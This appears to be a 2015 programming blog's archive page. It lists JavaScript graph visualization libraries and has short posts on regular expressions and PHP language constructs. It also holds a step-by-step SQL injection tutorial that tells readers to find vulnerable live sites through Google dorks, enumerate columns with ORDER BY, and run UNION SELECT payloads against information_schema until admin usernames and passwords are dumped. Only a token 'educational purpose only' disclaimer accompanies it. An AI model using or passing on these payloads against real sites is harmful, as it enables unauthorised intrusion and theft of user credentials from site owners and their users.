Sunday, September 20, 2015

Interactive Graph Analysis and Visualization

Best Graph Library :)
  • SocialCompare has an extensive list of libraries, and the "Node / edge graph" line will filter for graph visualization ones.
  • DataVisualization.ch has evaluated many libraries, including node/graph ones. Unfortunately there's no direct link so you'll have to filter for "graph":
    Selection DataVisualization.ch
Here's a list of similar projects (some have been already mentioned here):

Pure JavaScript Libraries

  • vis.js supports many types of network/edge graphs, plus timelines and 2D/3D charts. Auto-layout, auto-clustering, springy physics engine, mobile-friendly, keyboard navigation, hierarchical layout, animation etc. MIT licensed and developed by a Dutch firm specializing in research on self-organizing networks.
  • Cytoscape.js - interactive graph analysis and visualization with mobile support, following jQuery conventions. Funded via NIH grants and developed by by @maxkfranz (see his answer below) with help from several universities and other organizations.
  • The JavaScript InfoVis Toolkit - Jit, an interactive, multi-purpose graph drawing and layout framework. See for example the Hyperbolic Tree. Built by Twitter dataviz architect Nicolas Garcia Belmonte and bought by Sencha in 2010.
  • D3.js Powerful multi-purpose JS visualization library, the successor of Protovis. See the force-directed graph example, and other graph examples in the gallery.
  • Plotly's JS visualization library uses D3.js with JS, Python, R, and MATLAB bindings. See a nexworkx example in IPython here, human interaction example here, and JS Embed API.
  • sigma.js Lightweight but powerful library for drawing graphs
  • jsPlumb jQuery plug-in for creating interactive connected graphs
  • Springy - a force-directed graph layout algorithm
  • Processing.js Javascript port of the Processing library by John Resig
  • JS Graph It - drag'n'drop boxes connected by straight lines. Minimal auto-layout of the lines.
  • RaphaelJS's Graffle - interactive graph example of a generic multi-purpose vector drawing library. RaphaelJS can't layout nodes automatically; you'll need another library for that.
  • JointJS Core - David Durman's MPL-licensed open source diagramming library. It can be used to create either static diagrams or fully interactive diagramming tools and application builders. Works in browsers supporting SVG. Layout algorithms not-included in the core package
  • HighCharts - Highcharts is a charting library written in pure JavaScript. it is based on SVG, but unlike many others, it also supports older browsers who use VML to render vector graphic. It is licenced under CC BY-NC 3.0

Commercial libraries

Abandoned libraries

  • Cytoscape Web Embeddable JS Network viewer (no new features planned; succeeded by Cytoscape.js)
  • Canviz JS renderer for Graphviz graphs. Abandoned in Sep 2013.
  • arbor.js Sophisticated graphing with nice physics and eye-candy. Abandoned in May 2012. Several semi-maintained forks exist.
  • jssvggraph "The simplest possible force directed graph layout algorithm implemented as a Javascript library that uses SVG objects". Abandoned in 2012.
  • jsdot Client side graph drawing application. Abandoned in 2011.
  • Protovis Graphical Toolkit for Visualization (JavaScript). Replaced by d3.
  • Moo Wheel Interactive JS representation for connections and relations (2008)
  • JSViz 2007-era graph visualization script
  • dagre Graph layout for JavaScript

Non-Javascript Libraries

  • Graphviz Sophisticated graph visualization language
  • Flare Beautiful and powerful Flash based graph drawing
  • NodeBox Python Graph Visualization
Read more....

Thursday, September 10, 2015

How to Getting start with regular expressions


Regular expressions are a very useful tool for developers. They allow to find, identify or replace text, words or any kind of characters. In this article, I have compiled 15+ extremely useful regular expressions that any web developer should have in his toolkit.

Getting started with regular expressions
For many beginners, regular expressions seems to be hard to learn and use. In fact, they’re far less hard than you may think. Before we dive deep inside regexp with useful and reusable codes, let’s quickly see the basics:
Regular expressions syntax
Regular Expression
Will match…
foo
The string “foo”
^foo
“foo” at the start of a string
foo$
“foo” at the end of a string
^foo$
“foo” when it is alone on a string
[abc]
a, b, or c
[a-z]
Any lowercase letter
[^A-Z]
Any character that is not a uppercase letter
(gif|jpg)
Matches either “gif” or “jpeg”
[a-z]+
One or more lowercase letters
[0-9.-]
Аny number, dot, or minus sign
^[a-zA-Z0-9_]{1,}$
Any word of at least one letter, number or _
([wx])([yz])
wy, wz, xy, or xz
[^A-Za-z0-9]
Any symbol (not a number or a letter)
([A-Z]{3}|[0-9]{4})
Matches three letters or four numbers

PHP regular expression functions
Function
Description
preg_match()
The preg_match() function searches string for pattern, returning true if pattern exists, and false otherwise.
preg_match_all()
The preg_match_all() function matches all occurrences of pattern in string.
preg_replace()
The preg_replace() function operates just like ereg_replace(), except that regular expressions can be used in the pattern and replacement input parameters.
preg_split()
The preg_split() function operates exactly like split(), except that regular expressions are accepted as input parameters for pattern.
preg_grep()
The preg_grep() function searches all elements of input_array, returning all elements matching the regexp pattern.
preg_ quote()
Quote regular expression characters

Validate domain name
Verify if a string is a valid domain name.


Read more....

Friday, September 4, 2015

Language Constructs in PHP

PHP has a huge collection of built-in functions that you can call directly within your PHP files. While going through built-in functions, you might have faced the term language construct.

For an example you might have seen that echo() is not a function but a language construct. In addition to echo() following are some other language constructs.

1.print()
2.unset()
3.isset()
4.empty()
5.include()
6.require()
7.die()

Any computer language is made up of basic elements and these elements are known by their respective language parsers. For an example if is a basic element in PHP and PHP parser is aware of it.

So when a PHP file is going through PHP parser, if it sees an if then it knows that there should be a left parenthesis next to that. If not, PHP parser would throw an error. Here we can call if is a language construct because PHP parser knows what it is without further analyzing.

In a similar way we can think that PHP parser recognize and know what to do when it sees echo() or any other language construct. When PHP parser finds a built-in function, first it needs to check the language definitions and convert the function into set of known language constructs.
Language Constructs Are Relatively Faster

If you research on language constructs vs built-in functions, you might have seen that it says language constructs are relatively faster over built-in functions since they are basic elements of the language.

However you shouldn’t think about the difference in anything more than microseconds. And also final execution time depends on the parameters that are passed into language constructs or built-in functions.
Language Constructs Don’t Need Parenthesis

1.echo ('Today is a beautiful day');
2.echo 'Today is a beautiful day';
3.$today = 'Today is a beautiful day';
4.echo $today;
5.
6.die('You are not authorized to access this content');
7.die;

All above coding lines are correct and processed as expected. Note that echo() and die() both are language constructs and they can be used with or without parenthesis. However you can’t use built-in functions without parenthesis.
1.
count($namesArray); // This is correct assuming that $namesArray is defined.
2.
count $namesArray; // This is incorrect. It's identified as a syntax error.
Read more....

How to hack Website using SQL Injection with easy Steps.


it's my first tutorial on website hacking using SQL Injection attack with easy and simple steps.
I have seen many guys they can't understand SQL Injection method because it's really very hard to understand and Inject Malicious code into URL and get website Database, So here I created SQL Injection tutorial with easy steps and understandable, Hope you all will like it.

✔ What is SQL Injection ?

SQL Injection is one the most popular Web application hacking method. In SQL Injection an attacker find website vulnerability (Vulnerability means Weakness point of website) and Inject Malicious code into URL and get Database of Website and Hack the website this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation.
Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.

✔ Requirements :-

SQL Injection Dorks. (Click to download) Skip ad's after 5 Sec
Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
Firefox with Hack bar add-on. (Click to download Hackbar add-on)
Little bit understanding of SQL Injection and URL
Fresh Mind to Understand it.
✔ Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
Click here to download Huge list of SQL Injection Dorks
Search it on Google for Eg. these are few SQL Injection Vulnerable Dorks. :-
___________
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________
Basically I always use Google to search Vulnerable websites.
Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites, the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id=
Yeah, Definitely it will have because this all website having DB and SQL Injection String and related to SQL Injection Dorks.
For Eg. www.targetwebsite.com/index.php?id=8

✔ How to Check for Vulnerability.

Open any website URL related to SQL Injection Dorks.
Put Single Quote at the End of the website URL ( ' )
Note :- To Check the Vulnerability put sigle Quote ( ' ) at the end of the website URL and Hit Enter.
For Eg. www.targetwebsite.com/index.php?id=2'
If the page remains same or Not found then it's not vulnerable and if the page shows Error like this :-
An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
This means the website is vulnerable to SQL Injection.

✔ Step 2. Find the number of Columns.

Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now it's time to find no. of Columns present in the Database.
To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
For Example :- Change it's Order By 1,2,3,4 like below :-
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
www.targetwebsite.com/index.php?id=8 Order by 4
www.targetwebsite.com/index.php?id=8 Order by 5

And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--
If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this :-
An error occurred...
Unknown column '12' in 'order clause'
This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.
www.targetwebsite.com/index.php?id=8 Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 7 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 8 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 9 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 12 (Error)
Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB.
So now here I found number of columns in my DB :-
Number of Columns = 11

✔ Step 3. Find the Vulnerable Column.

Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence".
And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--And Suppose above Method won't work then use below method:-www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--
✔ And Once if the Query has been Executed then it will display the number of Column. :)  Yeahh.... !!
In the Above result, I found three vulnerable Columns 2,3 and 4.
let take 2 as our tutorial.
Well... ! We found Vulnerable Columns, Now Next Step.

✔Step 4. Finding version, Database and User.

Now this time to find out website Database version and User
Just replace Vulnerable Column no. with "version()"
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
And now Hit Enter : and you will get result.
Now again do the same replace Vulnerable column with different query like :- database(), user()For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--
And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔ Step 5. Finding the Table name.

Here we found vulnerable Column, DB Version name and User it's time to get Table name.
If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)
Let us find now Table name of the Database, Same here Replace Vulnerable Column number with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Now hit Enter and you can see Complete Table of Database.
(Click on Image to Enlarge it)
Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :- userDatabase. Let us choose that table userdatabase and Go on Next step.

✔ Step 6. Finding the Column name.

Now same to find Column names, replace "group_concat(table_name) with "group_concat(column_name)"
and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
__________________________________________________________________
Note :- Do not hit Enter now.... First of all Convert
table name into Mysql Char String()
Install the Hackbar add-on in Firefox Click here to Download
After Installing you can see the toolbar, and if you can't then Hit F9.Select sql->Mysql->MysqlChar() in the Hackbar.

Enter the Table name you want to convert it into Mysql Char
Now you can see the Char like this :-
Copy and paste the code at the end of the url instead of the "mysqlchar"
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--
And Now Hit Enter and you will be able to see the Column names like this :-
(Click on Image to Enlarge it)
Great Here we found Username and Password Column

✔ Step 7. Explore Database & Hack it.

Cool......! now you know the next step what to do ..... get the ID and Password of Admin user using this Command into URL.Now replace group_concat(column_name) with group_concat(username,0x2a,password). or any other Column name you want to get Data.
For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.


Disclaimer:- The Above tutorial is completely for Educational purpose only, Do not use it to hack any third party website. I'll be not responsible for any SQL Injection attack performed by any reader.

Best of Luck
Read more....

Tuesday, September 1, 2015

how can we get site details

Site URLs may betray the framework and/or programming language but cannot be relied upon
HTTP response headers, cookies, stylesheets and source comments may also give clues.
Some nice tools for querying site details.

Some Good Sites 

Firefox addons:

Chrome Extensions:

Bookmarklets:

Read more....
Related Posts Plugin for WordPress, Blogger...